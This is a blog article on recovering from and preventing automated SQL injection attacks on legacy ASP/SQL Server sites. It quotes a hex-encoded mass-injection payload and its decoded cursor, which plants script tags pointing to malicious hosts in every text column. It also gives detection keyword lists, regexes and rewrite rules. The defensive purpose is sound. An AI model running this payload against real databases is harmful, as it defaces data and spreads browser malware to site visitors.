SQL injection attacks seem to be on the rise lately, not because there are more dedicated hackers spending time trying to exploit sites, but because most of the successful attacks are carried out by bots that trawl the net 24/7 hammering sites. By now we should all know how to prevent SQL injection from affecting our systems, but if you have a large back catalogue of older sites, created years ago and still in production, then they are going to be very vulnerable in the current climate. Even if these sites normally receive little or no traffic, if they are accessible on the Internet they are much more likely to become victims because of these bots.
This article will look at the various ways of preventing and recovering from an attack without having to spend months rewriting all those old sites to future-proof them. If people still use these old sites then they should be expected to work, and not greet the user with Google's hacked-site warning page. However, we all know time is money, and the money is in new developments, not in rewriting that old online ladies' shoe catalogue that was written in '98.
Latest forms of SQL Injection
Currently the biggest automated SQL injection attack comes from derivatives of the following:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20NVARCHAR(4000));EXEC(@S);
This tries to obfuscate the main section of the code by using a local variable to hold a hex-encoded string that is then decoded and executed. If we decode the main section we can see that the code uses the system tables to loop through all textual columns and insert script tags that reference a compromised site.
;DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.vtg43.ru/script.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.vtg43.ru/script.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
There are numerous variations of this hack, with the major differences being:
- The URI of the SCRIPT tag injected into the columns.
- The name and datatype of the main variable.
- Whether the UPDATE statement inserts the SCRIPT tag at the start or end of the existing data, or overwrites it completely.
See my post on the latest SQL injection URIs for a list of the sites currently doing the rounds.
So before we look at the various hack sticking plasters that can be applied, let's just clarify that the best way to avoid SQL injection is to design and develop your site following best-practice guidelines.
The best security is a layered approach that involves multiple barriers to make these pesky bots' lives as difficult as possible. So, just to make clear that I am not recommending a plaster as the number one SQL injection prevention method, I will first summarise some of the best practices that should be followed when developing new systems.
Prevention with good design.
The following should all be common knowledge by now, as SQL injection is not some newly discovered threat against webkind but has been around and evolving for many years. When developing new sites or upgrading legacy systems you should try to follow these basic rules, because developing with this threat in mind, as opposed to treating it as an afterthought, will always be the best mode of prevention.
- Validate all input taken from the client application that is to be passed to the database, using a whitelist rather than a blacklist approach. This basically means that rather than stripping out certain characters and symbols, you only allow those that the field you are updating requires. This means checking the data type and length of the value and handling anything inappropriate.
- Use stored procedures or parameterised queries, and let ADO handle the data type conversions and quote escaping (see the ADO sketch after this list). If you are used to building up strings to execute, then you are relying on your own foolproof coding skills to ensure that every value appended to the string is in the correct format and escaped correctly. You may think you would never make such a stupid mistake as forgetting to validate a value you add to the string, but say you were off ill one day, or on holiday, and a junior or a colleague had to make an edit to a page on your site. For example, suppose the required amend is to add a listbox to a page that lists news articles, so the user can filter by a particular news category that is identified and retrieved from the database using an integer. If they forget to validate that the value supplied from the listbox really is an integer, you can guarantee that one of these automated hack bots will exploit it within days, if not hours, of the change going live. I have had this exact situation happen on a major system: the change made by my colleague went live at 11pm, and by 7am the following morning the whole site had been compromised because of that one lapse in concentration. If you think command objects and parameters are too long-winded to write, then create yourself a helper script that uses the command's Parameters.Refresh method to build up the code you require.
- Only grant the database logon that the website users connect with the minimum privileges it requires. Don't give it automatic write access, and make sure all your CUD (create, update, delete) operations are carried out from stored procedures that the user has execute permission on. I know a lot of people do not like the overhead of creating a stored procedure for simple SELECTs that may only exist to populate a dropdown, and therefore use a mixture of stored procedures and client-side dynamic SQL, which is fine; by following this rule, even if a hacker finds a hole in one of your client-side SELECT statements to exploit, they will not have sufficient privileges to update the database.
- If you have to use dynamic SQL in stored procedures that accept values from the site, then use sp_executesql and not EXEC (a sketch combining this with the least-privilege point follows this list). A hacker could still exploit your system if you executed an unvalidated string within a stored procedure using EXEC(). You will also benefit from the system caching, and therefore reusing, the generated query plans when you use this system procedure to execute your dynamic SQL instead of EXEC.
- Make life hard for the hackers and don't show detailed error messages to your users when something goes wrong. Although the automated hack bots use brute force to hit every possible URL and parameter in the hope of finding a hole, a dedicated hacker probing your site feeds off the details provided when they come across a 500 error. Although it's still possible to exploit a site blind, it's a lot harder and more time-consuming than having the details of the SQL you are manipulating in front of you. It's amazing how many sites I still come across that show the SQL statement in their error messages. In fact, a very popular developer resource site (I will mention no names) that hosts message boards and technical articles, including some about SQL injection best practices, continues to show me the SQL statement it uses to log members in whenever I visit and it times out. End users do not need to see this information, and it's dangerous. Show them a nice friendly error message, and then email yourself the details or log them to a file or database if you really need to know what caused the error.
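As a rough illustration of the parameterised approach mentioned above, here is a minimal classic ASP/ADO sketch. The connection string, table and column names are made-up examples, not code from any real system.

<%
' Minimal sketch of a parameterised query using an ADO Command object.
' The connection string, table and column names are hypothetical examples.
Dim objCmd, objRS, intCategoryID

' Whitelist validation: the category filter must be a whole number
intCategoryID = Request.QueryString("CategoryID")
If Not IsNumeric(intCategoryID) Then intCategoryID = 0
intCategoryID = CLng(intCategoryID)

Set objCmd = Server.CreateObject("ADODB.Command")
objCmd.ActiveConnection = "YOUR CONNECTION STRING HERE"
objCmd.CommandType = 1 ' adCmdText
objCmd.CommandText = "SELECT ArticleID, Headline FROM NewsArticles WHERE CategoryID = ?"

' ADO handles the data typing and escaping; no string concatenation of values
objCmd.Parameters.Append objCmd.CreateParameter("CategoryID", 3, 1, , intCategoryID) ' 3 = adInteger, 1 = adParamInput

Set objRS = objCmd.Execute()
' ... loop through objRS as normal ...
objRS.Close : Set objRS = Nothing
Set objCmd = Nothing
%>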
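For the least-privilege and sp_executesql points, here is a T-SQL sketch of a search procedure that builds its dynamic part safely and is the only thing the website login can run. The Jobs table, its columns and the webuser login are hypothetical examples.

-- Sketch of a stored procedure that builds dynamic SQL safely with sp_executesql.
-- The Jobs table, its columns and the webuser login are hypothetical examples.
CREATE PROCEDURE dbo.usp_SearchJobs
    @Keyword NVARCHAR(100),
    @CategoryID INT = NULL
AS
BEGIN
    DECLARE @sql NVARCHAR(2000)

    SET @sql = N'SELECT JobID, JobTitle FROM dbo.Jobs WHERE JobTitle LIKE ''%'' + @Keyword + ''%'''
    IF @CategoryID IS NOT NULL
        SET @sql = @sql + N' AND CategoryID = @CategoryID'

    -- The values are passed as typed parameters rather than concatenated into the
    -- string, so they cannot break out of the statement and the plan can be reused.
    EXEC sp_executesql @sql,
        N'@Keyword NVARCHAR(100), @CategoryID INT',
        @Keyword = @Keyword, @CategoryID = @CategoryID
END
GO

-- The website login only needs permission to run the procedure,
-- not to read or write the underlying table directly.
GRANT EXECUTE ON dbo.usp_SearchJobs TO webuser
GO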
Oops, someone just hacked your site.
So you have just had a phone call from an angry customer complaining about a virus they have been infected with, because they still use IE 5 to browse the web and have just visited the home page of the site your company hosts for them. Or maybe you received one of Google's nice warning messages when you tried to access the site yourself. Or maybe you just noticed the layout is screwed up because of broken tags and truncated HTML caused by newly inserted SCRIPT tags that shouldn't be there. However you found out the wonderful news that your site has been exploited, you need to get moving as fast as possible, and you need to know two main things:
1. How did they manage to hack the site?
2. How much data has been compromised or, even worse, deleted?
Find the hole in the system.
There are many security and logging systems available for purchase, but I have a custom logging system on my sites that, at the bottom of each page, logs some core information about the user and the page they are on (user-agent, client IP, URL etc.) to a separate database. As well as using this for reporting traffic and user statistics, I have columns called IsHackAttempt and IsError, and a scheduled SQL Server Agent job that every 15 minutes takes the last 15 minutes of unchecked traffic data and checks the query-string for common SQL/XSS injection fingerprints. If it finds any, I set the IsHackAttempt flag.
This enables me to run a report of all hack attempts over a set time period. You may find on large systems that you are constantly under attack from these bots, so you should look for hack attempts on pages that have recently been updated or that have caused 500 errors. If you have SQL injection attempts that cause any sort of 500 error then you should investigate immediately, as something is not right: if a hacker can raise an SQL error on your system, it is highly probable they can manipulate your SQL, most likely due to incorrect parameter sanitisation.
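For illustration, the fingerprint check that such a job runs could be as simple as the following sketch. The TrafficLog table, its columns and the IsChecked flag are hypothetical; adapt them to however you log your traffic.

-- Flag any unchecked requests from the last 15 minutes whose query-string
-- contains a common SQL injection fingerprint. Table and column names are examples.
DECLARE @WindowStart DATETIME, @WindowEnd DATETIME
SET @WindowEnd = GETDATE()
SET @WindowStart = DATEADD(minute, -15, @WindowEnd)

UPDATE dbo.TrafficLog
SET IsHackAttempt = 1
WHERE IsChecked = 0
  AND Stamp BETWEEN @WindowStart AND @WindowEnd
  AND (   QueryString LIKE '%DECLARE%@%'
       OR QueryString LIKE '%sysobjects%'
       OR QueryString LIKE '%syscolumns%'
       OR QueryString LIKE '%CAST(0x%'
       OR QueryString LIKE '%EXEC(@%')

-- Mark the same window as checked so the next run only looks at new rows
UPDATE dbo.TrafficLog
SET IsChecked = 1
WHERE IsChecked = 0
  AND Stamp BETWEEN @WindowStart AND @WindowEnd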
If you don't have your own custom logging system, then you can either hunt through your log files using a tool such as Microsoft's Log Parser (http://www.securityfocus.com/infocus/1712) or bulk load the log files into a database for easy searching with SQL.
Some keywords and terms to look for in GET data that would indicate an SQL injection attempt include: exec, select, drop, delete, sys.objects, sysobjects, sys.columns, syscolumns, cast, varchar, user, @@version, @@servername, declare, update, table.
Most hacks come through the query-string, and therefore you should be able to find the attack in the log file. Hacks from a POSTed request will not show up in the log file unless you have written a custom method to log POST data, which I doubt many people do because of the overhead.
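As a rough illustration, a Log Parser query over standard IIS W3C logs could pull out suspect requests like this. The log file path and output file name are placeholders, and the keyword list can be extended from the list above.

LogParser.exe "SELECT date, time, c-ip, cs-uri-stem, cs-uri-query INTO HackAttempts.csv FROM ex*.log WHERE cs-uri-query LIKE '%DECLARE%' OR cs-uri-query LIKE '%sysobjects%' OR cs-uri-query LIKE '%syscolumns%' OR cs-uri-query LIKE '%CAST(0x%'" -i:IISW3C -o:CSV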
Use a bot to beat the bots.
There are many tools out there that help you find holes in your site. Unfortunately they are also used by hackers to find those same holes, so do yourself a favour and beat them to it.
Before any site goes live you should run a tool such as Paros Proxy (http://www.parosproxy.org), which will crawl your site and output a nice report detailing all the potentially exploitable holes in your system. As well as SQL injection it will look for XSS, CRLF injection and many other possible attacks. Run this against your development system, as running it on the production system will slow it down as well as possibly filling your database up with junk if you do have exploitable holes. Once you have run the tool, view the report and investigate every page that has been flagged as a possible target for a hacker.
A database restore is not always the answer.
The most common automated hacks at the moment involve an encoded SQL command that uses the system views available in SQL Server to output multiple UPDATE statements, inserting a <script> tag into every possible text-based column (char, varchar, nchar, nvarchar, text, ntext) in the database. This script will usually reference a .js file on some URL that tries to exploit well-known holes in older browsers through IFrames to download viruses and other spyware to the client's PC. Once you know the actual <script> tag that the exploit is using, you can search your database to see how much data has been affected. It may be that a backup restoration is not required, and there is no point losing customer data by restoring the last known safe backup when it's not needed.
Hunting for affected rows and columns.
Using a script such as my find text within database script, you can see how much of your data is affected. It may be that the SQL run by the hacker reached its command timeout limit before it could affect all your tables; especially on a large database system, only a small percentage of the data may be affected. It's also important to know whether the hacker has purposely or accidentally overwritten or deleted any data as well as inserting the <script> tag. I have seen hacks where the value for the column being updated was wrapped in a CAST(column AS VARCHAR) statement, which meant that anything after 30 characters was lost, because the default length when no size is supplied for a CAST to varchar/char is 30 characters. This would mean your column contained the reference to the virus-infected site and nothing else, and in that case a simple replace would not help, because even after removing the tag you would still be missing data.
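If you don't have a ready-made script to hand, a minimal sketch of the idea is below. It walks the same system views the attacker used, but only counts the rows in each text column that contain the injected tag. The @SearchFor value is a placeholder for whatever tag you actually found in your data.

-- Count affected rows per table/column without changing anything.
-- @SearchFor is a placeholder; use the exact tag found in your own data.
DECLARE @SearchFor VARCHAR(500), @T VARCHAR(255), @C VARCHAR(255)
SET @SearchFor = '%<script src="http://bad-example.invalid/x.js"></script>%'

DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u'
      AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- Report how many rows in this column contain the injected tag
    EXEC('SELECT ''' + @T + '.' + @C + ''' AS affected_column, COUNT(*) AS rows_hit ' +
         'FROM [' + @T + '] WHERE [' + @C + '] LIKE ''' + @SearchFor + '''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor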
If the hacker has only inserted the <script> at the start or the end of the existing text, which seems to be the most common type, then we can easily remove the offending HTML, either by using a script like my find and replace script or by reversing the code that the hacker used in the first place.
To reverse engineer the exploit, URL-decode the string, remove the EXEC(@S) statement at the end so you don't accidentally run it again, and replace it with a PRINT or SELECT so that when you run the SQL you actually see the CURSOR/LOOP that the exploit is using. You can then replace the hacker's UPDATE statement with one that REPLACEs the injected code with nothing.
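For example, a defanged version of the attacker's own cursor could look like the sketch below, which strips the injected tag out of every varchar/nvarchar column instead of inserting it. The @BadTag value is a placeholder for the exact tag found in your data; text and ntext columns cannot be updated with REPLACE directly, so handle those separately, and take a backup before running anything like this.

-- Strip the injected tag out of every varchar/nvarchar column in every user table.
-- @BadTag is a placeholder; use the exact tag found in your own data.
DECLARE @BadTag VARCHAR(500), @T VARCHAR(255), @C VARCHAR(255)
SET @BadTag = '"></title><script src="http://bad-example.invalid/x.js"></script><!--'

DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u'
      AND (b.xtype = 231 OR b.xtype = 167) -- nvarchar and varchar columns only

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- Remove the tag from any row that contains it
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = REPLACE([' + @C + '], ''' + @BadTag + ''', '''') ' +
         'WHERE [' + @C + '] LIKE ''%' + @BadTag + '%''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor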
Preventing re-infection.
Now that we have removed the offending HTML or JavaScript, we need to make sure we don't get re-infected. If we haven't managed to find the code that let the hacker in, and we haven't got time either to check each page or to rewrite the code to future-proof it, then we need some sticking plasters until we do get time. I wouldn't recommend the following approaches as the only way to prevent SQL injection, but if you have a number of old sites on a server that have holes and are repeatedly getting hit, they will certainly filter out a large percentage of possible hack attempts, and they can also serve as another layer in your multi-layered security approach.
Identify those bad bots and redirect them away from your site.
If you have been logging your users and hackers, then you could try blocking future hackers in a number of ways:
- Block IP addresses that have been the source of hack attempts at your firewall. The problem with this is that the IP addresses change constantly, and you are blocking only after an attack has occurred.
- If your site is supposed to be a local or regional site, e.g. a UK jobs board, then you may decide that only traffic from the UK or Europe should be allowed. You could identify the countries that generate the most hack attempts from your traffic data and then block ranges belonging to those countries. To find the IP ranges for any country, use a site such as Country IP Blocks. The problem with this approach is that in a global economy legitimate traffic could come from anywhere in the world, and although China seems to be the source of the majority of the current hackbots, it is also going to become the world's major economy in the next few years, so blocking the whole country may not be the best approach.
- Block by user-agent. This will only work for those hackers that don't spoof legitimate browsers and instead use easily identifiable agents such as Rippers or Fake IE. Why would a legitimate user have a browser named Fake IE? I do not know either, but you could block them either through application code or through an ISAPI rewrite rule. There is no point using robots.txt, as any hacker worthy of the name is going to ignore that.
Identify hackers as they attack your site.
Create a global include file that can be referenced by all your pages, and place it at the top of all other includes so it's the first piece of code run by your site. Create a function that takes the Request.QueryString and Request.Form as parameters and checks them for common SQL injection fingerprints. If any are found, redirect the user to a banned page.
I have also heard the idea that on this banned page you could try to gain some revenge by running an SQL WAIT statement to consume the attacker's connection time and slow them down a tad. However, if you have a limit on the number of concurrent open database connections and you are being hammered by a zombie botnet, you are going to consume your own connections with these WAIT commands, which will be detrimental to your legitimate visitors. This could also be turned against you as a form of SQL denial of service attack: if someone automated a series of requests to these pages, knowing that you have a connection limit, then once all the connections have been used up your site is basically out of action until a connection is released. On a database-driven site this is something to be very aware of.
A message on the page informing them that they have been identified and logged will not do much good either, considering most of these bots originate overseas and come from anonymous proxies or from unsuspecting users who have become part of a zombie network, but it's worth doing anyway, just to scare those teenage hackers based in your own country who may be experimenting.
Rather than just logging attempted or successful hack attempts for reporting later, this type of plaster actively blocks the most common SQL injections currently being executed by bots. I found that after implementing this function on a site that was receiving up to 2,000 hack attempts a day, the number dropped to 2-5 per day.
Your function could look a bit like this. The code is in VBScript due to its easy readability, and I'm sure most people could convert it to their preferred language with little work.
' Check both the query-string and any posted form data for known fingerprints
Dim blBanUser : blBanUser = False
blBanUser = BanUser(Request.Querystring)
If Not(blBanUser) Then
    blBanUser = BanUser(Request.Form)
End If
If (blBanUser) Then
    Response.Redirect("/banned.asp")
End If

' Returns True if the supplied request data matches a known SQL injection fingerprint.
' URLDecode is a helper function that decodes %XX escapes (see the sketch below).
Function BanUser(strIN)
    strIN = URLDecode(strIN)

    Dim objRegExpr : Set objRegExpr = New RegExp
    With objRegExpr
        .IgnoreCase = True
        .Global = True

        ' DECLARE @S NVARCHAR(4000) style variable declarations
        .Pattern = "DECLARE @\w+ N?VARCHAR\((?:\d{1,4}|max)\)"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If

        ' References to the system views (sysobjects, sys.columns etc.)
        .Pattern = "sys.?(?:objects|columns|tables)"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If

        ' EXEC(@S) used to run the decoded payload
        .Pattern = ";EXEC\(@\w+\);?"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If
    End With

    Set objRegExpr = Nothing
    BanUser = False
End Function
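The URLDecode call above is not a built-in classic ASP function, so the check assumes you have a helper along these lines; a minimal sketch that only handles + and %XX escapes is shown below.

' Minimal URL decoder: converts + to a space and %XX escapes to their characters.
Function URLDecode(strIN)
    Dim strOut, intI, strHex
    strOut = ""
    strIN = Replace(strIN, "+", " ")
    intI = 1
    Do While intI <= Len(strIN)
        If Mid(strIN, intI, 1) = "%" And intI + 2 <= Len(strIN) Then
            strHex = Mid(strIN, intI + 1, 2)
            On Error Resume Next
            strOut = strOut & Chr(CLng("&H" & strHex))
            If Err.Number <> 0 Then
                ' Not a valid %XX escape, so keep the characters as they are
                Err.Clear
                strOut = strOut & "%" & strHex
            End If
            On Error GoTo 0
            intI = intI + 3
        Else
            strOut = strOut & Mid(strIN, intI, 1)
            intI = intI + 1
        End If
    Loop
    URLDecode = strOut
End Function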
The problem with this approach is that it will slow down the response time of your site, as every page load has to perform these checks, and the more data is submitted, the more there is to check. You could extend it, but the more checking you do, the slower it will get.
You may also decide that, as the majority of hacks come through the query-string, checking the POST data is not required. Also, this method only checks for a few fingerprints, and the SQL injections are changing all the time. It may catch 99% of the attacks currently out there, but who is to say that a new type of attack that doesn't use those system tables or EXEC won't be rolled out in the following days? This is why some sort of logging and hack-identifying system is advisable, as it means you can see the types of attack being used against you and modify your defensive regular expressions as required.
ISAPI Filtering.
If you have the ability to add ISAPI rewriting to your site, then you can create rules that perform similar regular expression fingerprint checks to the function above, but before any application code is run, by placing the rules in an httpd.ini or .htaccess file. You can do this for one site or for the whole server.
The benefit of using ISAPI rewriting is that it is faster than getting your application to check for hack fingerprints, plus you can apply the plaster to the whole server in one hit for maximum effect. The downside is that you can only check the query-string and not the POST data. You also have the same issue of injection methods changing and having to update the file.
You could use the following three rules to block the majority of the automated hack bots at the moment. I have implemented these rules on my own sites and they have reduced the number of hacks that get logged by roughly 95%.
# SQL INJECTION FINGERPRINTING
RewriteRule /.*?\.asp\?.*?DECLARE[^a-z]+\@\w+[^a-z]+N?VARCHAR\((?:\d{1,4}|max)\).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /.*?\.asp\?.*?sys.?(?:objects|columns|tables).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /(?:.*?\.asp\?.*?);EXEC\(\@\w+\);?.* /jobboard/error-pages/banned.asp [I,L,U]
Block access to system views.
A lot of the current hacks make use of the system views available in SQL Server that list all the tables, columns, data types and other useful information that is a goldmine to a hacker. Giving them access to these views is like doing their work for them: they don't need to guess what names you have given the tables and columns in your database, because they have access to a list of all of them and can easily create a statement that loops through those of interest to create havoc.
In the majority of cases your website will not need access to these views, so blocking them will have no detrimental effect; however, you should verify this first with your developers and DBAs. I personally tend to use them in parts of a system where I allow certain admin users to upload data, as it lets me output the correct format for the upload (data type, column size, allow nulls etc.) without having to worry about changing code if a column gets modified. So there are perfectly valid reasons why your site may need access to these views; but if it doesn't, then deny access to your website user. Although this will not stop all SQL injection attacks, it will stop the current crop of automated bots that use the system views to create the necessary UPDATE statements, so while not perfect it is another useful layer of protection to add.
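As a sketch, the deny itself can be as simple as the following. The webuser name is a placeholder for your own site's database user, and you should test that nothing legitimate breaks before applying it.

-- Deny the website login direct SELECT access to the system metadata tables
-- that the automated UPDATE-injection bots rely on. 'webuser' is a placeholder.
DENY SELECT ON dbo.sysobjects TO webuser
DENY SELECT ON dbo.syscolumns TO webuser
-- On SQL Server 2005 and later the catalog views only show objects the user
-- already has some permission on, but the old compatibility views can be
-- denied in the same way if your site does not need them.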
Conclusion
SQL injection is on the rise due to automated bots, which means any and all sites available on the Internet could fall victim. New sites should be developed with this in mind and implemented with a multi-layered approach to prevention. This should take the form of data validation, parameterised queries and stored procedures, least-privilege access for users (including denying access to the system views), hiding error messages from users, and logging hack attempts so that defences can be kept up to date.
For a detailed look at SQL injection methods, see http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
For an article about preventing SQL injection attacks in ASP.NET, see http://msdn.microsoft.com/en-us/library/ms998271.aspx.
6 comments:
Great article, very detailed, with some good tips on beating those evil bots. I think I will implement the idea of ISAPI rules to bounce hackers off to a blank page. We are getting hundreds of hack attempts a day at the moment! All from China by the looks of things.
Hi!
I created a video tutorial about SQL injection.
Take a look:
http://www.webmastervideoschool.com/blog_item.php?id=7
Hi there,
I'm looking for a way to get Google to reconsider my website http://www.youtubeviewsbuy.com/
It has been hacked, and a lot of hidden links to unknown sites were injected into every page.
So my website lost several positions in the Google SERPs.
How to communicate with Google since I haven't got a manual action?
(I don't see any link to their reconsideration request page)
Thanks
Andrew
I've never found a direct way to contact Google. I think they believe having a real support system would be a huge overhead and require thousands of people to manage, seeing as the whole world uses their products. They rely on automated forms and so on.
I have only ever had one site downgraded, which was a URL shortener tool that was using the wrong kind of 300 redirect, e.g. a 302 not a 301 (temporary not permanent), and after changing the type I re-submitted my site for reconsideration in Webmaster Tools using a form that is buried away in there (hopefully it is still there - search on Google for it).
Remember there are sites that test whether your site has actually been demoted, e.g. http://pixelgroove.com/serp/sandbox_checker/
A quick way is to just search for your domain name in Google, and if it is NOT the top link you have been demoted.
Remember though that there are two types of demotion:
1. Due to a new Google algorithm such as Panda/Penguin that has made "being mobile friendly" a key indicator in their results. So use a tool such as Google's https://www.google.co.uk/webmasters/tools/mobile-friendly/ to test that your site IS mobile friendly, and if not, try to make it responsive. If you use certain CMSs, e.g. WordPress, a simple plugin installation like WP Touch will make it responsive.
2. Manual demotion due to spam, viruses, hacked sites etc. The best way is to clean the site up, ensure it is safe to use and then re-submit a sitemap to Google. Also look for the form in Webmaster Tools so that you can re-submit a demoted site to them for reconsideration. This is what I did when I had my demotion; after a week or so it came back to the top of Google for a domain search.
Obviously you could do a whois lookup on Google and try contacting them directly at their HQ, but I doubt you would get a reply. Have a search on Google for ways to contact them.
Taylor, why would an article on Android apps to hack phones have anything to do with a 12-year-old article on recovering from an SQL injection hack that corrupts an MS SQL database? Spam I think; link removed. People can search Google for free to download keyloggers and phone tracking apps to spy on people. The link is not relevant to an SQL injection hack attack.